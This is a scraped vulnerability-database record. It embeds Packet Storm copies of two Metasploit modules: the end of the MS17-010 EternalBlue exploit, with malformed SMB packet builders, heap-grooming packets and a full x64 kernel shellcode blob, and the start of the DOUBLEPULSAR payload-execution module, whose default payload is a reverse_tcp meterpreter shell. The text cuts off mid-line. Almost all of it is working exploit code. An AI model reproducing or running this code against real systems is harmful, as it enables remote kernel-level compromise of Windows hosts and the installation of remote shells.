\nend \n \ndef smb1_large_buffer(client, tree, sock) \nnt_trans_pkt = make_smb1_nt_trans_packet(tree.id, client.user_id) \n \n# send NT Trans \nvprint_status(\"Sending NT Trans Request packet\") \nsock.put(nt_trans_pkt) \n \nvprint_status(\"Receiving NT Trans packet\") \nraw = sock.get_once \n \n# Initial Trans2 request \ntrans2_pkt_nulled = make_smb1_trans2_exploit_packet(tree.id, client.user_id, :eb_trans2_zero, 0) \n \n# send all but last packet \nfor i in 1..14 \ntrans2_pkt_nulled << make_smb1_trans2_exploit_packet(tree.id, client.user_id, :eb_trans2_buffer, i) \nend \n \ntrans2_pkt_nulled << make_smb1_echo_packet(tree.id, client.user_id) \n \nvprint_status(\"Sending malformed Trans2 packets\") \nsock.put(trans2_pkt_nulled) \n \nsock.get_once \nend \n \ndef smb1_free_hole(start) \nsock = connect(false) \ndispatcher = RubySMB::Dispatcher::Socket.new(sock) \nclient = RubySMB::Client.new(dispatcher, smb1: true, smb2: false, username: '', password: '') \nclient.negotiate \n \npkt = \"\" \n \nif start \nvprint_status(\"Sending start free hole packet.\") \npkt = make_smb1_free_hole_session_packet(\"\\x07\\xc0\", \"\\x2d\\x01\", \"\\xf0\\xff\\x00\\x00\\x00\") \nelse \nvprint_status(\"Sending end free hole packet.\") \npkt = make_smb1_free_hole_session_packet(\"\\x07\\x40\", \"\\x2c\\x01\", \"\\xf8\\x87\\x00\\x00\\x00\") \nend \n \n#dump_packet(pkt) \nsock.put(pkt) \n \nvprint_status(\"Receiving free hole response.\") \nsock.get_once \n \nreturn sock \nend \n \ndef smb1_get_response(sock) \nraw = sock.get_once \nresponse = RubySMB::SMB1::SMBHeader.read(raw[4..-1]) \ncode = response.nt_status \nreturn code, raw, response \nend \n \ndef make_smb2_payload_headers_packet \n# don't need a library here, the packet is essentially nonsensical \npkt = \"\" \npkt << \"\\x00\" # session message \npkt << \"\\x00\\xff\\xf7\" # size \npkt << \"\\xfeSMB\" # SMB2 \npkt << \"\\x00\" * 124 \n \npkt \nend \n \ndef make_smb2_payload_body_packet(kernel_user_payload) \n# precalculated lengths \npkt_max_len = 4204 \npkt_setup_len = 497 \npkt_max_payload = pkt_max_len - pkt_setup_len # 3575 \n \n# this packet holds padding, KI_USER_SHARED_DATA addresses, and shellcode \npkt = \"\" \n \n# padding \npkt << \"\\x00\" * 0x8 \npkt << \"\\x03\\x00\\x00\\x00\" \npkt << \"\\x00\" * 0x1c \npkt << \"\\x03\\x00\\x00\\x00\" \npkt << \"\\x00\" * 0x74 \n \n# KI_USER_SHARED_DATA addresses \npkt << \"\\xb0\\x00\\xd0\\xff\\xff\\xff\\xff\\xff\" * 2 # x64 address \npkt << \"\\x00\" * 0x10 \npkt << \"\\xc0\\xf0\\xdf\\xff\" * 2 # x86 address \npkt << \"\\x00\" * 0xc4 \n \n# payload addreses \npkt << \"\\x90\\xf1\\xdf\\xff\" \npkt << \"\\x00\" * 0x4 \npkt << \"\\xf0\\xf1\\xdf\\xff\" \npkt << \"\\x00\" * 0x40 \n \npkt << \"\\xf0\\x01\\xd0\\xff\\xff\\xff\\xff\\xff\" \npkt << \"\\x00\" * 0x8 \npkt << \"\\x00\\x02\\xd0\\xff\\xff\\xff\\xff\\xff\" \npkt << \"\\x00\" \n \npkt << kernel_user_payload \n \n# fill out the rest, this can be randomly generated \npkt << \"\\x00\" * (pkt_max_payload - kernel_user_payload.length) \n \npkt \nend \n \ndef make_smb1_echo_packet(tree_id, user_id) \npkt = \"\" \npkt << \"\\x00\" # type \npkt << \"\\x00\\x00\\x31\" # len = 49 \npkt << \"\\xffSMB\" # SMB1 \npkt << \"\\x2b\" # Echo \npkt << \"\\x00\\x00\\x00\\x00\" # Success \npkt << \"\\x18\" # flags \npkt << \"\\x07\\xc0\" # flags2 \npkt << \"\\x00\\x00\" # PID High \npkt << \"\\x00\\x00\\x00\\x00\" # Signature1 \npkt << \"\\x00\\x00\\x00\\x00\" # Signature2 \npkt << \"\\x00\\x00\" # Reserved \npkt << [tree_id].pack(\"S>\") # Tree ID \npkt << \"\\xff\\xfe\" # PID \npkt << [user_id].pack(\"S>\") # UserID \npkt << \"\\x40\\x00\" # MultiplexIDs \n \npkt << \"\\x01\" # Word count \npkt << \"\\x01\\x00\" # Echo count \npkt << \"\\x0c\\x00\" # Byte count \n \n# echo data \n# this is an existing IDS signature, and can be nulled out \n#pkt << \"\\x4a\\x6c\\x4a\\x6d\\x49\\x68\\x43\\x6c\\x42\\x73\\x72\\x00\" \npkt << \"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x00\" \n \npkt \nend \n \n# Type can be :eb_trans2_zero, :eb_trans2_buffer, or :eb_trans2_exploit \ndef make_smb1_trans2_exploit_packet(tree_id, user_id, type, timeout) \ntimeout = (timeout * 0x10) + 3 \n \npkt = \"\" \npkt << \"\\x00\" # Session message \npkt << \"\\x00\\x10\\x35\" # length \npkt << \"\\xffSMB\" # SMB1 \npkt << \"\\x33\" # Trans2 request \npkt << \"\\x00\\x00\\x00\\x00\" # NT SUCCESS \npkt << \"\\x18\" # Flags \npkt << \"\\x07\\xc0\" # Flags2 \npkt << \"\\x00\\x00\" # PID High \npkt << \"\\x00\\x00\\x00\\x00\" # Signature1 \npkt << \"\\x00\\x00\\x00\\x00\" # Signature2 \npkt << \"\\x00\\x00\" # Reserved \npkt << [tree_id].pack(\"S>\") # TreeID \npkt << \"\\xff\\xfe\" # PID \npkt << [user_id].pack(\"S>\") # UserID \npkt << \"\\x40\\x00\" # MultiplexIDs \n \npkt << \"\\x09\" # Word Count \npkt << \"\\x00\\x00\" # Total Param Count \npkt << \"\\x00\\x10\" # Total Data Count \npkt << \"\\x00\\x00\" # Max Param Count \npkt << \"\\x00\\x00\" # Max Data Count \npkt << \"\\x00\" # Max Setup Count \npkt << \"\\x00\" # Reserved \npkt << \"\\x00\\x10\" # Flags \npkt << \"\\x35\\x00\\xd0\" # Timeouts \npkt << timeout.chr \npkt << \"\\x00\\x00\" # Reserved \npkt << \"\\x00\\x10\" # Parameter Count \n \n#pkt << \"\\x74\\x70\" # Parameter Offset \n#pkt << \"\\x47\\x46\" # Data Count \n#pkt << \"\\x45\\x6f\" # Data Offset \n#pkt << \"\\x4c\" # Setup Count \n#pkt << \"\\x4f\" # Reserved \n \nif type == :eb_trans2_exploit \nvprint_status(\"Making :eb_trans2_exploit packet\") \n \npkt << \"\\x41\" * 2957 \n \npkt << \"\\x80\\x00\\xa8\\x00\" # overflow \n \npkt << \"\\x00\" * 0x10 \npkt << \"\\xff\\xff\" \npkt << \"\\x00\" * 0x6 \npkt << \"\\xff\\xff\" \npkt << \"\\x00\" * 0x16 \n \npkt << \"\\x00\\xf1\\xdf\\xff\" # x86 addresses \npkt << \"\\x00\" * 0x8 \npkt << \"\\x20\\xf0\\xdf\\xff\" \n \npkt << \"\\x00\\xf1\\xdf\\xff\\xff\\xff\\xff\\xff\" # x64 \n \npkt << \"\\x60\\x00\\x04\\x10\" \npkt << \"\\x00\" * 4 \n \npkt << \"\\x80\\xef\\xdf\\xff\" \n \npkt << \"\\x00\" * 4 \npkt << \"\\x10\\x00\\xd0\\xff\\xff\\xff\\xff\\xff\" \npkt << \"\\x18\\x01\\xd0\\xff\\xff\\xff\\xff\\xff\" \npkt << \"\\x00\" * 0x10 \n \npkt << \"\\x60\\x00\\x04\\x10\" \npkt << \"\\x00\" * 0xc \npkt << \"\\x90\\xff\\xcf\\xff\\xff\\xff\\xff\\xff\" \npkt << \"\\x00\" * 0x8 \npkt << \"\\x80\\x10\" \npkt << \"\\x00\" * 0xe \npkt << \"\\x39\" \npkt << \"\\xbb\" \n \npkt << \"\\x41\" * 965 \n \nreturn pkt \nend \n \nif type == :eb_trans2_zero \nvprint_status(\"Making :eb_trans2_zero packet\") \npkt << \"\\x00\" * 2055 \npkt << \"\\x83\\xf3\" \npkt << \"\\x41\" * 2039 \n#pkt << \"\\x00\" * 4096 \nelse \nvprint_status(\"Making :eb_trans2_buffer packet\") \npkt << \"\\x41\" * 4096 \nend \n \npkt \n \nend \n \ndef make_smb1_nt_trans_packet(tree_id, user_id) \npkt = \"\" \npkt << \"\\x00\" # Session message \npkt << \"\\x00\\x04\\x38\" # length \npkt << \"\\xffSMB\" # SMB1 \npkt << \"\\xa0\" # NT Trans \npkt << \"\\x00\\x00\\x00\\x00\" # NT SUCCESS \npkt << \"\\x18\" # Flags \npkt << \"\\x07\\xc0\" # Flags2 \npkt << \"\\x00\\x00\" # PID High \npkt << \"\\x00\\x00\\x00\\x00\" # Signature1 \npkt << \"\\x00\\x00\\x00\\x00\" # Signature2 \npkt << \"\\x00\\x00\" # Reserved \npkt << [tree_id].pack(\"S>\") # TreeID \npkt << \"\\xff\\xfe\" # PID \npkt << [user_id].pack(\"S>\") # UserID \npkt << \"\\x40\\x00\" # MultiplexID \n \npkt << \"\\x14\" # Word Count \npkt << \"\\x01\" # Max Setup Count \npkt << \"\\x00\\x00\" # Reserved \npkt << \"\\x1e\\x00\\x00\\x00\" # Total Param Count \npkt << \"\\xd0\\x03\\x01\\x00\" # Total Data Count \npkt << \"\\x1e\\x00\\x00\\x00\" # Max Param Count \npkt << \"\\x00\\x00\\x00\\x00\" # Max Data Count \npkt << \"\\x1e\\x00\\x00\\x00\" # Param Count \npkt << \"\\x4b\\x00\\x00\\x00\" # Param Offset \npkt << \"\\xd0\\x03\\x00\\x00\" # Data Count \npkt << \"\\x68\\x00\\x00\\x00\" # Data Offset \npkt << \"\\x01\" # Setup Count \npkt << \"\\x00\\x00\" # Function <unknown> \npkt << \"\\x00\\x00\" # Unknown NT transaction (0) setup \npkt << \"\\xec\\x03\" # Byte Count \npkt << \"\\x00\" * 0x1f # NT Parameters \n \n# undocumented \npkt << \"\\x01\" \npkt << \"\\x00\" * 0x3cd \n \npkt \nend \n \ndef make_smb1_free_hole_session_packet(flags2, vcnum, native_os) \npkt = \"\" \npkt << \"\\x00\" # Session message \npkt << \"\\x00\\x00\\x51\" # length \npkt << \"\\xffSMB\" # SMB1 \npkt << \"\\x73\" # Session Setup AndX \npkt << \"\\x00\\x00\\x00\\x00\" # NT SUCCESS \npkt << \"\\x18\" # Flags \npkt << flags2 # Flags2 \npkt << \"\\x00\\x00\" # PID High \npkt << \"\\x00\\x00\\x00\\x00\" # Signature1 \npkt << \"\\x00\\x00\\x00\\x00\" # Signature2 \npkt << \"\\x00\\x00\" # Reserved \npkt << \"\\x00\\x00\" # TreeID \npkt << \"\\xff\\xfe\" # PID \npkt << \"\\x00\\x00\" # UserID \npkt << \"\\x40\\x00\" # MultiplexID \n#pkt << \"\\x00\\x00\" # Reserved \n \npkt << \"\\x0c\" # Word Count \npkt << \"\\xff\" # No further commands \npkt << \"\\x00\" # Reserved \npkt << \"\\x00\\x00\" # AndXOffset \npkt << \"\\x04\\x11\" # Max Buffer \npkt << \"\\x0a\\x00\" # Max Mpx Count \npkt << vcnum # VC Number \npkt << \"\\x00\\x00\\x00\\x00\" # Session key \npkt << \"\\x00\\x00\" # Security blob length \npkt << \"\\x00\\x00\\x00\\x00\" # Reserved \npkt << \"\\x00\\x00\\x00\\x80\" # Capabilities \npkt << \"\\x16\\x00\" # Byte count \n#pkt << \"\\xf0\" # Security Blob: <MISSING> \n#pkt << \"\\xff\\x00\\x00\\x00\" # Native OS \n#pkt << \"\\x00\\x00\" # Native LAN manager \n#pkt << \"\\x00\\x00\" # Primary domain \npkt << native_os \npkt << \"\\x00\" * 17 # Extra byte params \n \npkt \nend \n \ndef make_smb1_anonymous_login_packet \n# Neither Rex nor RubySMB appear to support Anon login? \npkt = \"\" \npkt << \"\\x00\" # Session message \npkt << \"\\x00\\x00\\x88\" # length \npkt << \"\\xffSMB\" # SMB1 \npkt << \"\\x73\" # Session Setup AndX \npkt << \"\\x00\\x00\\x00\\x00\" # NT SUCCESS \npkt << \"\\x18\" # Flags \npkt << \"\\x07\\xc0\" # Flags2 \npkt << \"\\x00\\x00\" # PID High \npkt << \"\\x00\\x00\\x00\\x00\" # Signature1 \npkt << \"\\x00\\x00\\x00\\x00\" # Signature2 \npkt << \"\\x00\\x00\" # TreeID \npkt << \"\\xff\\xfe\" # PID \npkt << \"\\x00\\x00\" # Reserved \npkt << \"\\x00\\x00\" # UserID \npkt << \"\\x40\\x00\" # MultiplexID \n \npkt << \"\\x0d\" # Word Count \npkt << \"\\xff\" # No further commands \npkt << \"\\x00\" # Reserved \npkt << \"\\x88\\x00\" # AndXOffset \npkt << \"\\x04\\x11\" # Max Buffer \npkt << \"\\x0a\\x00\" # Max Mpx Count \npkt << \"\\x00\\x00\" # VC Number \npkt << \"\\x00\\x00\\x00\\x00\" # Session key \npkt << \"\\x01\\x00\" # ANSI pw length \npkt << \"\\x00\\x00\" # Unicode pw length \npkt << \"\\x00\\x00\\x00\\x00\" # Reserved \npkt << \"\\xd4\\x00\\x00\\x00\" # Capabilities \npkt << \"\\x4b\\x00\" # Byte count \npkt << \"\\x00\" # ANSI pw \npkt << \"\\x00\\x00\" # Account name \npkt << \"\\x00\\x00\" # Domain name \n \n# Windows 2000 2195 \npkt << \"\\x57\\x00\\x69\\x00\\x6e\\x00\\x64\\x00\\x6f\\x00\\x77\\x00\\x73\\x00\\x20\\x00\\x32\" \npkt << \"\\x00\\x30\\x00\\x30\\x00\\x30\\x00\\x20\\x00\\x32\\x00\\x31\\x00\\x39\\x00\\x35\\x00\" \npkt << \"\\x00\\x00\" \n \n# Windows 2000 5.0 \npkt << \"\\x57\\x00\\x69\\x00\\x6e\\x00\\x64\\x00\\x6f\\x00\\x77\\x00\\x73\\x00\\x20\\x00\\x32\" \npkt << \"\\x00\\x30\\x00\\x30\\x00\\x30\\x00\\x20\\x00\\x35\\x00\\x2e\\x00\\x30\\x00\\x00\\x00\" \n \npkt \nend \n \n# ring3 = user mode encoded payload \n# proc_name = process to inject APC into \n# ep_thl_b = EPROCESS.ThreadListHead.Blink offset \n# et_alertable = ETHREAD.Alertable offset \n# teb_acp = TEB.ActivationContextPointer offset \n# et_tle = ETHREAD.ThreadListEntry offset \ndef make_kernel_user_payload(ring3, proc_name, ep_thl_b, et_alertable, teb_acp, et_tle) \nsc = make_kernel_shellcode \nsc << [ring3.length].pack(\"S<\") \nsc << ring3 \nsc \nend \n \ndef make_kernel_shellcode \n# https://github.com/RiskSense-Ops/MS17-010/blob/master/payloads/x64/src/exploit/kernel.asm \n# Name: kernel \n# Length: 1019 bytes \n \n#\"\\xcc\"+ \n\"\\xB9\\x82\\x00\\x00\\xC0\\x0F\\x32\\x48\\xBB\\xF8\\x0F\\xD0\\xFF\\xFF\\xFF\\xFF\" + \n\"\\xFF\\x89\\x53\\x04\\x89\\x03\\x48\\x8D\\x05\\x0A\\x00\\x00\\x00\\x48\\x89\\xC2\" + \n\"\\x48\\xC1\\xEA\\x20\\x0F\\x30\\xC3\\x0F\\x01\\xF8\\x65\\x48\\x89\\x24\\x25\\x10\" + \n\"\\x00\\x00\\x00\\x65\\x48\\x8B\\x24\\x25\\xA8\\x01\\x00\\x00\\x50\\x53\\x51\\x52\" + \n\"\\x56\\x57\\x55\\x41\\x50\\x41\\x51\\x41\\x52\\x41\\x53\\x41\\x54\\x41\\x55\\x41\" + \n\"\\x56\\x41\\x57\\x6A\\x2B\\x65\\xFF\\x34\\x25\\x10\\x00\\x00\\x00\\x41\\x53\\x6A\" + \n\"\\x33\\x51\\x4C\\x89\\xD1\\x48\\x83\\xEC\\x08\\x55\\x48\\x81\\xEC\\x58\\x01\\x00\" + \n\"\\x00\\x48\\x8D\\xAC\\x24\\x80\\x00\\x00\\x00\\x48\\x89\\x9D\\xC0\\x00\\x00\\x00\" + \n\"\\x48\\x89\\xBD\\xC8\\x00\\x00\\x00\\x48\\x89\\xB5\\xD0\\x00\\x00\\x00\\x48\\xA1\" + \n\"\\xF8\\x0F\\xD0\\xFF\\xFF\\xFF\\xFF\\xFF\\x48\\x89\\xC2\\x48\\xC1\\xEA\\x20\\x48\" + \n\"\\x31\\xDB\\xFF\\xCB\\x48\\x21\\xD8\\xB9\\x82\\x00\\x00\\xC0\\x0F\\x30\\xFB\\xE8\" + \n\"\\x38\\x00\\x00\\x00\\xFA\\x65\\x48\\x8B\\x24\\x25\\xA8\\x01\\x00\\x00\\x48\\x83\" + \n\"\\xEC\\x78\\x41\\x5F\\x41\\x5E\\x41\\x5D\\x41\\x5C\\x41\\x5B\\x41\\x5A\\x41\\x59\" + \n\"\\x41\\x58\\x5D\\x5F\\x5E\\x5A\\x59\\x5B\\x58\\x65\\x48\\x8B\\x24\\x25\\x10\\x00\" + \n\"\\x00\\x00\\x0F\\x01\\xF8\\xFF\\x24\\x25\\xF8\\x0F\\xD0\\xFF\\x56\\x41\\x57\\x41\" + \n\"\\x56\\x41\\x55\\x41\\x54\\x53\\x55\\x48\\x89\\xE5\\x66\\x83\\xE4\\xF0\\x48\\x83\" + \n\"\\xEC\\x20\\x4C\\x8D\\x35\\xE3\\xFF\\xFF\\xFF\\x65\\x4C\\x8B\\x3C\\x25\\x38\\x00\" + \n\"\\x00\\x00\\x4D\\x8B\\x7F\\x04\\x49\\xC1\\xEF\\x0C\\x49\\xC1\\xE7\\x0C\\x49\\x81\" + \n\"\\xEF\\x00\\x10\\x00\\x00\\x49\\x8B\\x37\\x66\\x81\\xFE\\x4D\\x5A\\x75\\xEF\\x41\" + \n\"\\xBB\\x5C\\x72\\x11\\x62\\xE8\\x18\\x02\\x00\\x00\\x48\\x89\\xC6\\x48\\x81\\xC6\" + \n\"\\x08\\x03\\x00\\x00\\x41\\xBB\\x7A\\xBA\\xA3\\x30\\xE8\\x03\\x02\\x00\\x00\\x48\" + \n\"\\x89\\xF1\\x48\\x39\\xF0\\x77\\x11\\x48\\x8D\\x90\\x00\\x05\\x00\\x00\\x48\\x39\" + \n\"\\xF2\\x72\\x05\\x48\\x29\\xC6\\xEB\\x08\\x48\\x8B\\x36\\x48\\x39\\xCE\\x75\\xE2\" + \n\"\\x49\\x89\\xF4\\x31\\xDB\\x89\\xD9\\x83\\xC1\\x04\\x81\\xF9\\x00\\x00\\x01\\x00\" + \n\"\\x0F\\x8D\\x66\\x01\\x00\\x00\\x4C\\x89\\xF2\\x89\\xCB\\x41\\xBB\\x66\\x55\\xA2\" + \n\"\\x4B\\xE8\\xBC\\x01\\x00\\x00\\x85\\xC0\\x75\\xDB\\x49\\x8B\\x0E\\x41\\xBB\\xA3\" + \n\"\\x6F\\x72\\x2D\\xE8\\xAA\\x01\\x00\\x00\\x48\\x89\\xC6\\xE8\\x50\\x01\\x00\\x00\" + \n\"\\x41\\x81\\xF9\\xBF\\x77\\x1F\\xDD\\x75\\xBC\\x49\\x8B\\x1E\\x4D\\x8D\\x6E\\x10\" + \n\"\\x4C\\x89\\xEA\\x48\\x89\\xD9\\x41\\xBB\\xE5\\x24\\x11\\xDC\\xE8\\x81\\x01\\x00\" + \n\"\\x00\\x6A\\x40\\x68\\x00\\x10\\x00\\x00\\x4D\\x8D\\x4E\\x08\\x49\\xC7\\x01\\x00\" + \n\"\\x10\\x00\\x00\\x4D\\x31\\xC0\\x4C\\x89\\xF2\\x31\\xC9\\x48\\x89\\x0A\\x48\\xF7\" + \n\"\\xD1\\x41\\xBB\\x4B\\xCA\\x0A\\xEE\\x48\\x83\\xEC\\x20\\xE8\\x52\\x01\\x00\\x00\" + \n\"\\x85\\xC0\\x0F\\x85\\xC8\\x00\\x00\\x00\\x49\\x8B\\x3E\\x48\\x8D\\x35\\xE9\\x00\" + \n\"\\x00\\x00\\x31\\xC9\\x66\\x03\\x0D\\xD7\\x01\\x00\\x00\\x66\\x81\\xC1\\xF9\\x00\" + \n\"\\xF3\\xA4\\x48\\x89\\xDE\\x48\\x81\\xC6\\x08\\x03\\x00\\x00\\x48\\x89\\xF1\\x48\" + \n\"\\x8B\\x11\\x4C\\x29\\xE2\\x51\\x52\\x48\\x89\\xD1\\x48\\x83\\xEC\\x20\\x41\\xBB\" + \n\"\\x26\\x40\\x36\\x9D\\xE8\\x09\\x01\\x00\\x00\\x48\\x83\\xC4\\x20\\x5A\\x59\\x48\" + \n\"\\x85\\xC0\\x74\\x18\\x48\\x8B\\x80\\xC8\\x02\\x00\\x00\\x48\\x85\\xC0\\x74\\x0C\" + \n\"\\x48\\x83\\xC2\\x4C\\x8B\\x02\\x0F\\xBA\\xE0\\x05\\x72\\x05\\x48\\x8B\\x09\\xEB\" + \n\"\\xBE\\x48\\x83\\xEA\\x4C\\x49\\x89\\xD4\\x31\\xD2\\x80\\xC2\\x90\\x31\\xC9\\x41\" + \n\"\\xBB\\x26\\xAC\\x50\\x91\\xE8\\xC8\\x00\\x00\\x00\\x48\\x89\\xC1\\x4C\\x8D\\x89\" + \n\"\\x80\\x00\\x00\\x00\\x41\\xC6\\x01\\xC3\\x4C\\x89\\xE2\\x49\\x89\\xC4\\x4D\\x31\" + \n\"\\xC0\\x41\\x50\\x6A\\x01\\x49\\x8B\\x06\\x50\\x41\\x50\\x48\\x83\\xEC\\x20\\x41\" + \n\"\\xBB\\xAC\\xCE\\x55\\x4B\\xE8\\x98\\x00\\x00\\x00\\x31\\xD2\\x52\\x52\\x41\\x58\" + \n\"\\x41\\x59\\x4C\\x89\\xE1\\x41\\xBB\\x18\\x38\\x09\\x9E\\xE8\\x82\\x00\\x00\\x00\" + \n\"\\x4C\\x89\\xE9\\x41\\xBB\\x22\\xB7\\xB3\\x7D\\xE8\\x74\\x00\\x00\\x00\\x48\\x89\" + \n\"\\xD9\\x41\\xBB\\x0D\\xE2\\x4D\\x85\\xE8\\x66\\x00\\x00\\x00\\x48\\x89\\xEC\\x5D\" + \n\"\\x5B\\x41\\x5C\\x41\\x5D\\x41\\x5E\\x41\\x5F\\x5E\\xC3\\xE9\\xB5\\x00\\x00\\x00\" + \n\"\\x4D\\x31\\xC9\\x31\\xC0\\xAC\\x41\\xC1\\xC9\\x0D\\x3C\\x61\\x7C\\x02\\x2C\\x20\" + \n\"\\x41\\x01\\xC1\\x38\\xE0\\x75\\xEC\\xC3\\x31\\xD2\\x65\\x48\\x8B\\x52\\x60\\x48\" + \n\"\\x8B\\x52\\x18\\x48\\x8B\\x52\\x20\\x48\\x8B\\x12\\x48\\x8B\\x72\\x50\\x48\\x0F\" + \n\"\\xB7\\x4A\\x4A\\x45\\x31\\xC9\\x31\\xC0\\xAC\\x3C\\x61\\x7C\\x02\\x2C\\x20\\x41\" + \n\"\\xC1\\xC9\\x0D\\x41\\x01\\xC1\\xE2\\xEE\\x45\\x39\\xD9\\x75\\xDA\\x4C\\x8B\\x7A\" + \n\"\\x20\\xC3\\x4C\\x89\\xF8\\x41\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xC2\\x8B\" + \n\"\\x42\\x3C\\x48\\x01\\xD0\\x8B\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xD0\\x50\\x8B\" + \n\"\\x48\\x18\\x44\\x8B\\x40\\x20\\x49\\x01\\xD0\\x48\\xFF\\xC9\\x41\\x8B\\x34\\x88\" + \n\"\\x48\\x01\\xD6\\xE8\\x78\\xFF\\xFF\\xFF\\x45\\x39\\xD9\\x75\\xEC\\x58\\x44\\x8B\" + \n\"\\x40\\x24\\x49\\x01\\xD0\\x66\\x41\\x8B\\x0C\\x48\\x44\\x8B\\x40\\x1C\\x49\\x01\" + \n\"\\xD0\\x41\\x8B\\x04\\x88\\x48\\x01\\xD0\\x5E\\x59\\x5A\\x41\\x58\\x41\\x59\\x41\" + \n\"\\x5B\\x41\\x53\\xFF\\xE0\\x56\\x41\\x57\\x55\\x48\\x89\\xE5\\x48\\x83\\xEC\\x20\" + \n\"\\x41\\xBB\\xDA\\x16\\xAF\\x92\\xE8\\x4D\\xFF\\xFF\\xFF\\x31\\xC9\\x51\\x51\\x51\" + \n\"\\x51\\x41\\x59\\x4C\\x8D\\x05\\x1A\\x00\\x00\\x00\\x5A\\x48\\x83\\xEC\\x20\\x41\" + \n\"\\xBB\\x46\\x45\\x1B\\x22\\xE8\\x68\\xFF\\xFF\\xFF\\x48\\x89\\xEC\\x5D\\x41\\x5F\" + \n\"\\x5E\\xC3\" \nend \n \nend \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/142548/ms17_010_eternalblue.rb.txt"}, {"lastseen": "2019-10-02T22:58:30", "description": "", "cvss3": {}, "published": "2019-10-01T00:00:00", "type": "packetstorm", "title": "DOUBLEPULSAR Payload Execution / Neutralization", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "modified": "2019-10-01T00:00:00", "id": "PACKETSTORM:154690", "href": "https://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = GreatRanking \n \ninclude Msf::Exploit::Remote::SMB::Client \n \nMAX_SHELLCODE_SIZE = 4096 \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization', \n'Description' => %q{ \nThis module executes a Metasploit payload against the Equation Group's \nDOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. \n \nWhile this module primarily performs code execution against the implant, \nthe \"Neutralize implant\" target allows you to disable the implant. \n}, \n'Author' => [ \n'Equation Group', # DOUBLEPULSAR implant \n'Shadow Brokers', # Equation Group dump \n'zerosum0x0', # DOPU analysis and detection \n'Luke Jennings', # DOPU analysis and detection \n'wvu', # Metasploit module and arch detection \n'Jacob Robles' # Metasploit module and RCE help \n], \n'References' => [ \n['MSB', 'MS17-010'], \n['CVE', '2017-0143'], \n['CVE', '2017-0144'], \n['CVE', '2017-0145'], \n['CVE', '2017-0146'], \n['CVE', '2017-0147'], \n['CVE', '2017-0148'], \n['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'], \n['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'], \n['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'], \n['URL', 'https://github.com/countercept/doublepulsar-detection-script'], \n['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'], \n['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1'] \n], \n'DisclosureDate' => '2017-04-14', \n'License' => MSF_LICENSE, \n'Platform' => 'win', \n'Arch' => ARCH_X64, \n'Privileged' => true, \n'Payload' => { \n'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size, \n'DisableNops' => true \n}, \n'Targets' => [ \n['Execute payload', {}], \n['Neutralize implant', {}] \n], \n'DefaultTarget' => 0, \n'DefaultOptions' => { \n'EXITFUNC' => 'thread', \n'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp' \n}, \n'Notes' => { \n'AKA' => ['DOUBLEPULSAR'], \n'RelatedModules' => [ \n'auxiliary/scanner/smb/smb_ms17_010', \n'exploit/windows/smb/ms17_010_eternalblue' \n], \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION] \n} \n)) \n \nregister_advanced_options([ \nOptBool.new('DefangedMode', [true, 'Run in defanged mode', true]), \nOptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe']) \n]) \nend \n \nOPCODES = { \nping: 0x23, \nexec: 0xc8, \nkill: 0x77 \n} \n \nSTATUS_CODES = { \nnot_detected: 0x00, \nsuccess: 0x10, \ninvalid_params: 0x20, \nalloc_failure: 0x30 \n} \n \ndef calculate_doublepulsar_status(m1, m2) \nSTATUS_CODES.key(m2.to_i - m1.to_i) \nend \n \n# algorithm to calculate the XOR Key for DoublePulsar knocks \ndef calculate_doublepulsar_xor_key(s) \nx = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8))) \nx & 0xffffffff # this line was added just to truncate to 32 bits \nend \n \n# The arch is adjacent to the XOR key in the SMB signature \ndef calculate_doublepulsar_arch(s) \ns == 0 ? ARCH_X86 : ARCH_X64 \nend \n \ndef generate_doublepulsar_timeout(op) \nk = SecureRandom.random_bytes(4).unpack('V').first \n0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00 \nend \n \ndef generate_doublepulsar_param(op, body) \ncase OPCODES.key(op) \nwhen :ping, :kill \n\"\\x00\" * 12 \nwhen :exec \nRex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*')) \nend \nend \n \ndef check \nipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\" \n \n@tree_id = do_smb_setup_tree(ipc_share) \nvprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\") \nvprint_status(\"Target OS is #{smb_peer_os}\") \n \nvprint_status('Sending ping to DOUBLEPULSAR') \ncode, signature1, signature2 = do_smb_doublepulsar_pkt \nmsg = 'Host is likely INFECTED with DoublePulsar!' \n \ncase calculate_doublepulsar_status(@multiplex_id, code) \nwhen :success \n@xor_key = calculate_doublepulsar_xor_key(signature1) \n@arch = calculate_doublepulsar_arch(signature2) \n \narch_str = \ncase @arch \nwhen ARCH_X86 \n'x86 (32-bit)' \nwhen ARCH_X64 \n'x64 (64-bit)' \nend \n \nvprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 